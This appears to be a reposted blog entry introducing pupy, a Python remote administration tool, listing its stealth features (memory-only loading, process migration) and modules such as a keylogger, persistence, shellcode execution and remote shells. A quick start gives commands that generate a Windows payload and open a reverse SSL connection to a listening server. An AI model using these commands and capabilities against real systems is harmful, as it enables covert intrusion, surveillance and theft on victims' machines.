Python remote administration tool: pupy

Posted by jopen 9 years ago | 13K views | pupy, Python development

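Pupy is a remote administration tool with an embedded Python interpreter, which allows its modules to load Python packages from memory and to access remote Python objects transparently. Pupy uses a reflective DLL and leaves no trace on disk.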

Features:

  • On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd in-memory import currently works on Windows only; .so in-memory import is not implemented.)
  • modules are quite simple to write and pupy is easily extensible
  • Pupy uses rpyc (https://github.com/tomerfiliba/rpyc) and a module can directly access Python objects on the remote client
    • we can also access remote objects interactively from the pupy shell, and even auto-completion of remote attributes works!
  • the communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future
  • all the non-interactive modules can be dispatched to multiple hosts in one command
  • multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • command aliases can be defined in the config

Implemented Modules:

  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell
  • shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali Linux, Ubuntu and Mac OS X 10.10.5.

generate/run a payload

for Windows

    ./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe

You can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux

    pip install rpyc  # (or manually copy it if you are not admin)
    python reverse_ssl.py 192.168.0.1:443

for Mac OS X

    easy_install rpyc  # (or manually copy it if you are not admin)
    python reverse_ssl.py 192.168.0.1:443

start the server

1. optionally edit pupy.conf to change the bind address / port
2. start the pupy server:

    ./pupysh.py

Some screenshots

list connected clients

screenshot1

help

screenshot3

execute python code on all clients

screenshot2

execute a command on all clients; the exception is retrieved if the command does not exist

screenshot4

use a filter to send a module only to selected clients

screenshot5

migrate into another process

screenshot6

interactive shell

screenshot7

interactive python shell

screenshot8

Project homepage: http://www.baiduhome.net/lib/view/home/1443084003685
